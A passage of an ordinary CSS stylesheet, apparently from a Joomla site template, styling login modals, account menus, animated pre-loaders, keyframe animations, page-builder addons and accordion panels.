  float: left !important;
}
.ap-modal-login .modal-content .modal-body .forget-name-link a {
  font-weight: 600;
}
.ap-modal-login .modal-content .modal-footer {
  max-height: 40px;
  line-height: 40px;
  font-weight: 500;
  text-align: center;
}
.ap-modal-login .modal-header .title {
  text-align: left;
  margin-top: 0;
}
.ap-modal-login .modal-header .close {
  margin-top: -2px;
  position: absolute;
  right: 10px;
  top: 10px;
  padding: 10px;
  text-align: center;
  -webkit-transition: .3s;
  -moz-transition: .3s;
  -o-transition: .3s;
  transition: .3s;
}
.ap-modal-login .modal-header .close i {
  margin-right: 0;
  font-size: 32px;
}
.ap-modal-login .dropdown .dropdown-menu {
  position: absolute;
  opacity: 0;
  visibility: hidden;
  z-index: 1000;
  display: block;
  float: left;
  right: 0;
  left: auto;
  min-width: 200px;
  border: 1px solid #ccc;
  border: 1px solid rgba(0,0,0,0.12);
  border-radius: 0 0 4px 4px;
  -webkit-box-shadow: 0 4px 9px rgba(0,0,0,0.12);
  box-shadow: 0 4px 9px rgba(0,0,0,0.12);
  -webkit-transition: all 0.35s cubic-bezier(0.225,0.025,0.225,1.225);
  -moz-transition: all 0.35s cubic-bezier(0.225,0.025,0.225,1.225);
  -o-transition: all 0.35s cubic-bezier(0.225,0.025,0.225,1.225);
  transition: all 0.35s cubic-bezier(0.225,0.025,0.225,1.225);
  -webkit-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
  -moz-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
  -ms-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
  -o-transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
  transform: translateY(-20px) scale(0.9) perspective(800px) rotateX(30deg);
}
.ap-modal-login .open {
  z-index: 13999;
}
.ap-modal-login .open .dropdown-menu {
  opacity: 1;
  visibility: visible;
  position: absolute;
  z-index: 13999;
  -webkit-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -moz-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -ms-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  -o-transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
  transform: translateY(0) scale(1) perspective(1000px) rotateX(0deg);
}
.ap-modal-login button {
  background: transparent;
}
.profile fieldset legend {
  line-height: 1.5;
}
.profile fieldset .dl-horizontal {
  margin: 0 auto 45px;
}
.profile fieldset .dl-horizontal dt,
.profile fieldset .dl-horizontal dd {
  line-height: 27px;
  vertical-align: middle;
  padding: 3px;
  margin: 0 auto 5px;
}
.profile fieldset .dl-horizontal dt {
  min-width: 25%;
  display: block;
}
.view-profile .select-menu select {
  display: block;
}
.view-profile button:focus {
  outline: none;
}
.view-profile a[title="Cancel"] {
  background-color: #888888;
  color: #fff;
}
.view-profile a[title="Cancel"]:hover {
  background-color: #6f6f6f;
}
.ap-my-account-menu {
  position: relative;
  cursor: pointer;
  padding: 0;
}
.ap-my-account-menu .signin-img-wrap {
  float: left;
  height: 20px;
  line-height: 21px;
}
.ap-my-account-menu .signin-img-wrap i.pe {
  font-size: 20px;
  margin: 0 0 0 4px;
  line-height: 21px;
  vertical-align: middle;
}
.ap-my-account-menu .signin-img-wrap img {
  display: inline-block;
}
.ap-my-account-menu .info-wrap {
  display: inline-block;
  margin-left: 8px;
  margin-bottom: 7px;
  line-height: 24px;
}
.ap-my-account-menu .info-wrap .info-text {
  font-size: 14px;
}
.ap-my-account-menu ul.menu {
  padding: 5px 0;
}
.ap-my-account-menu ul.menu >li {
  border: none;
  min-width: 200px;
  border-bottom: 1px solid rgba(189,189,189,0.2);
}
.ap-my-account-menu ul.menu >li a i {
  width: 22px;
  line-height: 18px;
  display: inline-block;
  vertical-align: top;
}
.ap-my-account-menu ul.menu >li a i.fa,
.ap-my-account-menu ul.menu >li a i.fas,
.ap-my-account-menu ul.menu >li a i.far {
  margin-top: 9px;
  font-size: 17px;
}
.ap-my-account-menu ul.menu >li a i.pe {
  margin-top: 8px;
  font-size: 18px;
}
.ap-my-account-menu ul.menu >li:last-child {
  border-bottom: none;
}
.ap-my-account-menu ul.menu >li:last-child a {
  padding-bottom: 6px;
}
.ap-my-account-menu ul.menu >li:last-child a i.pe {
  font-size: 22px;
  width: 25px;
  line-height: 20px;
}
.ap-my-account-menu ul.menu a {
  display: block;
  padding: 4px 20px;
  font-size: 14px;
  font-weight: 400;
  cursor: pointer;
}
.ap-my-account-menu ul.menu a:before {
  display: none;
}
.login-wrapper >i.pe,
.registration-wrapper >i.pe,
.reset-wrapper >i.pe,
.remind-wrapper >i.pe {
  position: absolute;
  top: 7vh;
  left: 2vw;
  font-size: 20vw;
}
.login-wrapper .group-control input,
.registration-wrapper .group-control input,
.reset-wrapper .group-control input,
.remind-wrapper .group-control input {
  min-height: 45px;
}
.login-wrapper >i.pe {
  -webkit-transform: rotate(28deg);
  transform: rotate(28deg);
  top: 9vh;
  right: 8vw;
  left: auto;
  font-size: 22vw;
}
.remind-wrapper {
  margin: 10vh auto;
}
.remind-wrapper >i.pe {
  font-size: 17vw;
  left: 2vw;
}
.reset-wrapper {
  margin: 10vh auto;
}
.reset-wrapper >i.pe {
  left: 7vw;
}
.sp-pre-loader {
  position: fixed;
  left: 0;
  top: 0;
  width: 100vw;
  height: 100vh;
  z-index: 999;
}
.sp-pre-loader .sp-loader-clock {
  border-radius: 60px;
  bottom: 0;
  height: 80px;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 0;
  width: 80px;
}
.sp-pre-loader .sp-loader-clock:after {
  content: "";
  position: absolute;
  top: 2px;
  left: 48%;
  height: 38px;
  width: 4px;
  border-radius: 5px;
  -webkit-transform-origin: 50% 97%;
  transform-origin: 50% 97%;
  -webkit-animation: grdAiguille 2s linear infinite;
  animation: grdAiguille 2s linear infinite;
}
.sp-pre-loader .sp-loader-clock:before {
  content: "";
  position: absolute;
  top: 6px;
  left: 48%;
  height: 35px;
  width: 4px;
  border-radius: 5px;
  -webkit-transform-origin: 50% 94%;
  transform-origin: 50% 94%;
  -webkit-animation: ptAiguille 12s linear infinite;
  animation: ptAiguille 12s linear infinite;
}
.sp-pre-loader .sp-loader-circle {
  position: absolute;
  height: 50px;
  width: 50px;
  border-radius: 50px;
  left: 0;
  top: -4px;
  right: 0;
  bottom: 0;
  margin: auto;
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
  -webkit-animation: loader1 1s linear infinite;
  animation: loader1 1s linear infinite;
}
.sp-pre-loader .sp-loader-circle:after {
  content: "";
  position: absolute;
  top: -4px;
  left: -4px;
  height: 50px;
  width: 50px;
  border-radius: 50px;
  border: 4px solid transparent;
}
.sp-pre-loader .loader-flip {
  position: absolute;
  width: 100px;
  height: 100px;
  margin: auto;
  left: 0;
  top: 0;
  right: 0;
  bottom: 0;
  -webkit-perspective: 120px;
  -moz-perspective: 120px;
  -ms-perspective: 120px;
  perspective: 120px;
}
.sp-pre-loader .loader-flip:after {
  content: "";
  position: absolute;
  left: 25px;
  top: 25px;
  width: 50px;
  height: 50px;
  border-radius: 4px;
  -webkit-animation: flip 1s linear infinite;
  animation: flip 1s linear infinite;
}
.sp-pre-loader .sp-loader-bubble-loop {
  position: absolute;
  width: 12px;
  height: 12px;
  left: 0;
  top: 0;
  right: 0;
  bottom: 0;
  margin: auto;
  border-radius: 12px;
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
  -webkit-animation: loader6 1s ease-in-out infinite;
  animation: loader6 1s ease-in-out infinite;
}
.sp-pre-loader .sp-loader-bubble-loop:before {
  content: "";
  position: absolute;
  top: 0px;
  left: -25px;
  height: 12px;
  width: 12px;
  border-radius: 12px;
}
.sp-pre-loader .sp-loader-bubble-loop:after {
  content: "";
  position: absolute;
  top: 0px;
  left: 25px;
  height: 12px;
  width: 12px;
  border-radius: 12px;
}
.sp-pre-loader .circle-two {
  bottom: 0;
  height: 100px;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 0;
  width: 100px;
}
.sp-pre-loader .circle-two > span,
.sp-pre-loader .circle-two > span:before,
.sp-pre-loader .circle-two > span:after {
  content: "";
  display: block;
  border-radius: 50%;
  position: absolute;
  top: 50%;
  left: 50%;
  -webkit-transform: translate(-50%,-50%);
  -moz-transform: translate(-50%,-50%);
  -ms-transform: translate(-50%,-50%);
  -o-transform: translate(-50%,-50%);
  transform: translate(-50%,-50%);
}
.sp-pre-loader .circle-two > span {
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  border-left-color: transparent;
  -webkit-animation: effect-2 2s infinite linear;
  -moz-animation: effect-2 2s infinite linear;
  -ms-animation: effect-2 2s infinite linear;
  -o-animation: effect-2 2s infinite linear;
  animation: effect-2 2s infinite linear;
}
.sp-pre-loader .circle-two > span:before {
  width: 75%;
  height: 75%;
  border-right-color: transparent;
}
.sp-pre-loader .circle-two > span:after {
  width: 50%;
  height: 50%;
  border-bottom-color: transparent;
}
.sp-pre-loader .wave-two-wrap {
  position: absolute;
  margin: auto;
  left: 0;
  right: 0;
  top: 50%;
  width: 90px;
}
.sp-pre-loader .wave-two {
  margin: 0;
  list-style: none;
  width: 90px;
  position: relative;
  padding: 0;
  height: 10px;
}
.sp-pre-loader .wave-two li {
  position: absolute;
  width: 2px;
  height: 0;
  bottom: 0;
}
.sp-pre-loader .wave-two li:nth-child(1) {
  left: 0;
  -webkit-animation: sequence1 1s ease infinite 0;
  animation: sequence1 1s ease infinite 0;
}
.sp-pre-loader .wave-two li:nth-child(2) {
  left: 15px;
  -webkit-animation: sequence2 1s ease infinite 0.1s;
  animation: sequence2 1s ease infinite 0.1s;
}
.sp-pre-loader .wave-two li:nth-child(3) {
  left: 30px;
  -webkit-animation: sequence1 1s ease-in-out infinite 0.2s;
  animation: sequence1 1s ease-in-out infinite 0.2s;
}
.sp-pre-loader .wave-two li:nth-child(4) {
  left: 45px;
  -webkit-animation: sequence2 1s ease-in infinite 0.3s;
  animation: sequence2 1s ease-in infinite 0.3s;
}
.sp-pre-loader .wave-two li:nth-child(5) {
  left: 60px;
  -webkit-animation: sequence1 1s ease-in-out infinite 0.4s;
  animation: sequence1 1s ease-in-out infinite 0.4s;
}
.sp-pre-loader .wave-two li:nth-child(6) {
  left: 75px;
  -webkit-animation: sequence2 1s ease infinite 0.5s;
  animation: sequence2 1s ease infinite 0.5s;
}
.sp-pre-loader .sp-loader-audio-wave {
  width: 3em;
  height: 2em;
  background-repeat: no-repeat;
  background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
  animation: audioWave 1.5s linear infinite;
  position: absolute;
  left: 0;
  top: 0;
  bottom: 0;
  right: 0;
  margin: auto;
}
.sp-pre-loader .sp-loader-with-logo {
  top: 0;
  left: 0;
  width: 100%;
  height: 110px;
  right: 0;
  bottom: 0;
  margin: auto;
  text-align: center;
  position: absolute;
}
.sp-pre-loader .sp-loader-with-logo .logo {
  display: inline-block;
  width: auto;
}
.sp-pre-loader .sp-loader-with-logo .logo > img {
  max-height: 100%;
}
.sp-pre-loader .sp-loader-with-logo .line {
  bottom: 0;
  height: 3px;
  left: 0;
  position: absolute;
  top: auto;
}
@-webkit-keyframes flip {
  0% {
    -webkit-transform: rotate(0);
  }
  50% {
    -webkit-transform: rotateY(180deg);
  }
  100% {
    -webkit-transform: rotateY(180deg) rotateX(180deg);
  }
}
@keyframes flip {
  0% {
    transform: rotate(0);
  }
  50% {
    transform: rotateY(180deg);
  }
  100% {
    transform: rotateY(180deg) rotateX(180deg);
  }
}
@-webkit-keyframes grdAiguille {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
  }
}
@keyframes grdAiguille {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
@-webkit-keyframes ptAiguille {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
  }
}
@keyframes ptAiguille {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
@-webkit-keyframes loader1 {
  0% {
    -webkit-transform: rotate(0deg);
  }
  100% {
    -webkit-transform: rotate(360deg);
  }
}
@keyframes loader1 {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}
@-webkit-keyframes loader6 {
  0% {
    -webkit-transform: rotate(0deg);
  }
  50% {
    -webkit-transform: rotate(180deg);
  }
  100% {
    -webkit-transform: rotate(180deg);
  }
}
@keyframes loader6 {
  0% {
    transform: rotate(0deg);
  }
  50% {
    transform: rotate(180deg);
  }
  100% {
    transform: rotate(180deg);
  }
}
@keyframes rotate-360 {
  from {
    -moz-transform: rotate(0);
    -ms-transform: rotate(0);
    -webkit-transform: rotate(0);
    transform: rotate(0);
  }
  to {
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes audioWave {
  25% {
    background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
    background-repeat: no-repeat;
    background-size: 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
  }
  37.5% {
    background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
    background-repeat: no-repeat;
    background-size: 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em;
  }
  50% {
    background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
    background-repeat: no-repeat;
    background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em, 0.5em 0.25em;
  }
  62.5% {
    background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
    background-repeat: no-repeat;
    background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em, 0.5em 0.25em;
  }
  75% {
    background: linear-gradient(#333333,#333333) 0 50%, linear-gradient(#333333,#333333) 0.625em 50%, linear-gradient(#333333,#333333) 1.25em 50%, linear-gradient(#333333,#333333) 1.875em 50%, linear-gradient(#333333,#333333) 2.5em 50%;
    background-repeat: no-repeat;
    background-size: 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 0.25em, 0.5em 2em;
  }
}
@-webkit-keyframes effect-2 {
  from {
    -webkit-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes effect-2 {
  from {
    -moz-transform: rotate(0deg);
    -ms-transform: rotate(0deg);
    transform: rotate(0deg);
  }
  to {
    -moz-transform: rotate(360deg);
    -ms-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
@keyframes sequence1 {
  0% {
    height: 10px;
  }
  50% {
    height: 50px;
  }
  100% {
    height: 10px;
  }
}
@keyframes sequence2 {
  0% {
    height: 20px;
  }
  50% {
    height: 65px;
  }
  100% {
    height: 20px;
  }
}
@keyframes rot1 {
  100% {
    transform: skew(-10deg) translateX(50px) rotate(405deg);
  }
}
@-webkit-keyframes rot1 {
  100% {
    -webkit-transform: skew(-10deg) translateX(50px) rotate(405deg);
  }
}
@keyframes rot2 {
  100% {
    transform: skew(-10deg) rotate(525deg);
  }
}
@-webkit-keyframes rot2 {
  100% {
    -webkit-transform: skew(-10deg) rotate(525deg);
  }
}
@keyframes rot3 {
  100% {
    transform: skew(-10deg) translateX(20px) translateY(-50px) rotate(645deg);
  }
}
@-webkit-keyframes rot3 {
  100% {
    -webkit-transform: skew(-10deg) translateX(20px) translateY(-50px) rotate(645deg);
  }
}
@keyframes width {
  10% {
    width: 10%;
  }
  20% {
    width: 20%;
  }
  30% {
    width: 30%;
  }
  40% {
    width: 40%;
  }
  50% {
    width: 50%;
  }
  60% {
    width: 60%;
  }
  70% {
    width: 70%;
  }
  80% {
    width: 80%;
  }
  90% {
    width: 90%;
  }
  100% {
    width: 100%;
  }
}
.animated {
  -webkit-animation-duration: 1s;
  animation-duration: 1s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
.animated-2s {
  -webkit-animation-duration: 2s;
  animation-duration: 2s;
  -webkit-animation-fill-mode: forwards;
  animation-fill-mode: forwards;
}
@-webkit-keyframes fadeInDown {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,-50px,0);
    transform: translate3d(0,-50px,0);
  }
  to {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
@keyframes fadeInDown {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,-50px,0);
    transform: translate3d(0,-50px,0);
  }
  to {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
.fadeInDown {
  -webkit-animation-name: fadeInDown;
  animation-name: fadeInDown;
}
@-webkit-keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,30px,0);
    transform: translate3d(0,30px,0);
  }
  to {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
@keyframes fadeIn {
  from {
    opacity: 0;
    -webkit-transform: translate3d(0,30px,0);
    transform: translate3d(0,30px,0);
  }
  to {
    opacity: 1;
    -webkit-transform: none;
    transform: none;
  }
}
.fadeIn {
  -webkit-animation-name: fadeIn;
  animation-name: fadeIn;
}
@media screen and (min-width: 768px) and (max-width: 1199px) {
  .scrollup {
    bottom: 25px;
    right: 25px;
  }
  #sp-header {
    top: 65px;
  }
}
@media screen and (min-width: 320px) and (max-width: 767px) {
  ul.social-icons {
    margin: 0;
    width: 100%;
    text-align: center;
  }
  .sp-contact-info {
    margin: 0;
    text-align: center;
    width: 100%;
  }
  .sp-contact-info li {
    font-size: 89%;
  }
}
.edit-article {
  margin: 0;
  float: right;
  display: inline-block;
  position: relative;
  width: 100px;
  z-index: 2;
  background: transparent;
}
.edit-article .btn.dropdown-toggle {
  border: 1px solid #f35d4b;
  background: transparent;
  color: #777;
  padding: 6px 10px;
  margin-top: 4px;
}
.edit-article .btn.dropdown-toggle:before {
  font-family: 'peIcon7';
  content: "\e62c";
  font-size: 21px;
  line-height: 24px;
  margin: 0 7px 0 10px;
}
.edit-article .btn.dropdown-toggle:hover {
  border: 1px solid #ef331b;
  color: #444;
}
.edit-article .btn.dropdown-toggle .icon-cog {
  display: none;
}
.edit-article .btn.dropdown-toggle .caret {
  margin: 12px 8px 0 0;
  vertical-align: top;
}
.lazyload,
.lazyloading {
  opacity: 0;
  height: 100%;
}
.lazyloaded {
  opacity: 1;
  -webkit-transition: opacity 650ms ease;
  -moz-transition: opacity 650ms ease;
  -o-transition: opacity 650ms ease;
  transition: opacity 650ms ease;
}
#sp-cookie-consent.position-bottom_left,
#sp-cookie-consent.position-bottom_right {
  box-shadow: 0 3px 8px rgba(50,50,50,0.25);
}
.has-left-right-modules {
  padding-top: 25px;
  margin: 0 auto;
}
.has-left-right-modules .sppb-row-container {
  width: 100%;
  padding: 0;
}
.has-left-right-modules .sppb-in-article {
  padding: 0 15px !important;
  margin: 0 auto !important;
}
.has-left-right-modules .sppb-in-article .sp-column {
  padding: 15px 0 0 0;
}
.sppb-row-container {
  margin-right: auto;
  margin-left: auto;
  padding-left: 15px;
  padding-right: 15px;
}
@media (min-width: 768px) {
  .sppb-row-container {
    width: 750px;
  }
  .layout-boxed .has-left-right-modules .sppb-in-article-left .sp-column,
  .layout-boxed .has-left-right-modules .sppb-in-article-right .sp-column {
    padding: 25px 15px;
  }
}
@media (min-width: 992px) {
  .sppb-row-container {
    width: 970px;
  }
}
@media (min-width: 1200px) {
  .sppb-row-container {
    width: 1170px;
  }
}
.sppb-container {
  margin-top: 0;
  margin-bottom: 0;
}
.sppb-addon-cta .sppb-addon-title {
  line-height: 1.2;
}
.sppb-addon-cta .sppb-cta-subtitle {
  margin-bottom: 0;
  line-height: 1.5;
}
.sppb-addon-cta .sppb-btn i {
  line-height: 1.3;
  margin-right: 6px;
}
.sppb-addon-cta .sppb-btn i.pe {
  font-size: 130%;
  vertical-align: middle;
  line-height: 1.4;
}
.sppb-addon-cta .sppb-btn-lg {
  line-height: 1.5;
}
.sppb-addon-single-image .sppb-addon-content a .overlay {
  position: relative;
  width: 100%;
  height: 100%;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i {
  position: absolute;
  display: block;
  width: 100%;
  height: auto;
  top: 50%;
  margin-top: 0;
  color: #fff;
  font-size: 250%;
  z-index: 2;
  font-weight: 800;
  opacity: 0;
  -webkit-transition: 400ms;
  -moz-transition: 400ms;
  -o-transition: 400ms;
  transition: 400ms;
}
.sppb-addon-single-image .sppb-addon-content a .overlay >i:before {
  width: 80px;
  height: 80px;
  padding: 10px;
  border-radius: 5px;
}
.sppb-addon-single-image .sppb-addon-content a .overlay:after {
  content: "";
  color: #fff;
  position: absolute;
  width: 100%;
  height: 100%;
  top: 0;
  left: 0;
  opacity: 0;
  -webkit-transition: 300ms;
  -moz-transition: 300ms;
  -o-transition: 300ms;
  transition: 300ms;
}
.sppb-addon-single-image .sppb-addon-content a .overlay:hover:after {
  opacity: 1;
}
.sppb-addon-single-image .sppb-addon-content a .overlay:hover >i {
  opacity: 1;
  margin-top: -25px;
}
.sppb-addon-single-image .sppb-addon-content a .overlay:hover >i:before {
  opacity: 1;
}
.sppb-addon-image-content {
  position: relative;
}
.sppb-addon-image-content .sppb-image-holder {
  position: absolute;
  top: 0;
  width: 50%;
  height: 100%;
  background-position: 50%;
  background-size: cover;
  background-repeat: no-repeat;
}
.sppb-addon-image-content.aligment-left .sppb-image-holder {
  left: 0;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder {
  padding: 40px 40px 40px 0;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn.sppb-btn-lg {
  font-size: 110%;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn >i.left {
  font-size: 110%;
  margin-right: 8px;
  margin-left: -2px;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn >i.left.pe {
  font-size: 125%;
  vertical-align: top;
  line-height: 1.1;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn >i.right {
  font-size: 110%;
  margin-left: 8px;
  margin-right: -2px;
}
.sppb-addon-image-content.aligment-left .sppb-content-holder .sppb-btn >i.right.pe {
  font-size: 125%;
  vertical-align: top;
  line-height: 1.1;
}
.sppb-addon-image-content.aligment-right .sppb-image-holder {
  right: 0;
}
.sppb-addon-image-content.aligment-right .sppb-content-holder {
  padding: 40px 0 40px 40px;
}
.sppb-addon-image-content.aligment-right .sppb-content-holder .sppb-btn.sppb-btn-lg {
  font-size: 110%;
}
.sppb-addon-image-content.aligment-right .sppb-content-holder .sppb-btn >i.right {
  font-size: 110%;
  line-height: 0.9;
  margin-right: 8px;
  margin-left: -2px;
}
.sppb-addon-image-content.aligment-right .sppb-content-holder .sppb-btn >i.right.pe {
  font-size: 125%;
  vertical-align: top;
  line-height: 1.1;
}
.sppb-addon-button-group .sppb-btn >i.fa,
.sppb-addon-button-group .sppb-btn >i.fas {
  margin-right: 4px;
}
.sppb-addon-button-group .sppb-btn >i.pe {
  margin: -2px 4px 0 -3px;
  font-size: 115%;
  vertical-align: middle;
  line-height: 1;
}
.sppb-modal-content .sppb-modal-header {
  padding: 20px 30px;
}
.sppb-modal-content .sppb-modal-body {
  padding: 30px;
}
.sppb-modal-content .sppb-close {
  position: absolute;
  right: 12px;
  top: 7px;
  font-size: 200%;
  z-index: 9;
}
.sppb-modal-selector.modal-selector-image,
.sppb-selector.modal-selector-image {
  margin: 0 auto;
  display: inline-block;
  width: auto;
  text-align: center;
}
.sppb-modal-selector.centered,
.sppb-selector.centered {
  display: table;
  text-align: center;
}
.firefox .sppb-modal-selector.modal-selector-image {
  display: block;
}
.modal-text {
  height: auto !important;
}
.sppb-btn.sppb-btn-lg.sppb-selector {
  font-size: 125%;
}
.sppb-btn.sppb-btn-lg.sppb-selector >i.fa,
.sppb-btn.sppb-btn-lg.sppb-selector >i.fas {
  margin-right: 6px;
}
.sppb-btn.sppb-btn-lg.sppb-selector >i.pe {
  margin-right: 6px;
  margin-top: -3px;
  vertical-align: middle;
}
div.sppb_prettyphoto .pp_loaderIcon {
  position: fixed;
  top: 50%;
  left: 50%;
  margin-top: -25px;
  margin-left: -25px;
  width: 50px;
  height: 50px;
  background: url(../images/loader.svg) center center no-repeat;
}
.sppb-addon h3.sppb-addon-title {
  margin: 20px 0;
  width: auto;
  padding-right: 30px;
  box-shadow: inset 0 -1px 0 #ddd;
  display: inline-table;
  line-height: 1.3;
}
.sppb-addon h3.sppb-addon-title:after {
  clear: both;
  display: block;
  float: left;
  content: "";
  position: relative;
  height: 2px;
  width: 70%;
  margin: 10px 30% 0 0;
  border-radius: 2px;
  padding: 0;
}
.pull-left .sppb-icon {
  margin-right: 10px;
}
.pull-right .sppb-icon {
  margin-left: 10px;
}
.sppb-panel-modern {
  background: transparent;
  border: 1px solid #ddd;
}
.sppb-panel-modern .sppb-panel-body {
  border-top-color: #f14833;
}
.sppb-panel-modern >.sppb-panel-heading {
  background: transparent;
  color: #1a1a1a;
}
.sppb-panel-modern >.sppb-panel-heading .sppb-toggle-direction > i {
  font-size: 20px;
  width: 30px;
  text-align: center;
}
.sppb-panel-default {
  border: none;
}
.sppb-panel-default >.sppb-panel-heading {
  background-color: transparent;
  margin: 5px 0 0 0;
  padding: 10px 20px;
  cursor: pointer;
  border: 1px solid #ddd;
  border-radius: 5px;
}
.sppb-panel-default >.sppb-panel-heading.active {
  border-radius: 5px 5px 0 0;
}
.sppb-panel-default >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  line-height: 26px;
  padding: 20px 25px;
  border: 1px solid #ddd;
  border-radius: 0 0 5px 5px;
  border-top: 0;
}
.sppb-panel-primary {
  border: none;
}
.sppb-panel-primary >.sppb-panel-heading {
  color: #fff;
  margin: 5px 0 0 0;
  padding: 10px 20px;
  cursor: pointer;
  border: none;
  border-radius: 5px;
}
.sppb-panel-primary >.sppb-panel-heading.active {
  border-radius: 5px 5px 0 0;
}
.sppb-panel-primary >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  line-height: 26px;
  padding: 20px 25px;
  border: 1px solid #ddd;
  border-radius: 0 0 5px 5px;
  border-top: 0;
}
.sppb-panel-default >.sppb-panel-heading:before,
.sppb-panel-default >.sppb-panel-heading.active:before,
.sppb-panel-primary >.sppb-panel-heading:before,
.sppb-panel-primary >.sppb-panel-heading.active:before {
  font-family: 'ap-arrows';
  font-size: 11px;
  margin-right: 5px;
  float: right;
}
.sppb-panel-default >.sppb-panel-heading:before,
.sppb-panel-primary >.sppb-panel-heading:before {
  content: "\e60c";
}
.sppb-panel-default >.sppb-panel-heading.active:before,
.sppb-panel-primary >.sppb-panel-heading.active:before {
  content: "\e60b";
}
.sppb-panel-flex {
  border: none;
}
.sppb-panel-flex >.sppb-panel-heading {
  border: none;
  border-bottom: 1px solid #ddd;
  border-radius: 0;
  padding: 10px 12px;
  margin-bottom: 0;
}
.sppb-panel-flex >.sppb-panel-heading:before {
  content: "";
}
.sppb-panel-flex >.sppb-panel-heading:after {
  font-family: 'ap-arrows';
  content: "\e605";
  float: right;
  font-size: 10px;
  margin-right: 10px;
  -webkit-transition: all .3s ease;
  -moz-transition: all .3s ease;
  -o-transition: all .3s ease;
  transition: all .3s ease;
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
}
.sppb-panel-flex >.sppb-panel-heading.active {
  border-radius: 7px 7px 0 0;
}
.sppb-panel-flex >.sppb-panel-heading.active:after {
  font-family: 'ap-arrows';
  font-size: 10px;
  -webkit-transform: rotate(-90deg);
  -moz-transform: rotate(-90deg);
  -ms-transform: rotate(-90deg);
  -o-transform: rotate(-90deg);
  transform: rotate(-90deg);
}
.sppb-panel-flex >.sppb-panel-heading +.sppb-panel-collapse > .sppb-panel-body {
  line-height: 26px;
  padding: 20px 15px;
  border: 0;
  border-radius: 0;
}
.sppb-panel-heading .sppb-panel-title {
  font-size: 105%;
  font-weight: normal;
}
.sppb-panel-heading .sppb-panel-title >i.fa,
.sppb-panel-heading .sppb-panel-title >i.fas {
  margin-right: 10px;
}
.sppb-panel-heading .sppb-panel-title >i.pe {
  margin-right: 7px;
  vertical-align: top;
  line-height: 1.3;
  font-size: 120%;
  font-weight: 500;
}
.sppb-icon >span >i {
  vertical-align: middle;
}
.flex-icons {
  display: block;
}
.flex-icons .flex-icon-wrap {
  display: inline-table;
  -webkit-transition: all .25s ease-in-out;
  -moz-transition: all .25s ease-in-out;
  -o-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
}
.flex-icons .flex-icon-wrap a {
  -webkit-transition: all .25s ease-in-out;
  -moz-transition: all .25s ease-in-out;
  -o-transition: all .25s ease-in-out;
  transition: all .25s ease-in-out;
  opacity: 1;
}
.flex-icons .flex-icon-wrap a span {
  display: inline-table;
  vertical-align: middle;
}
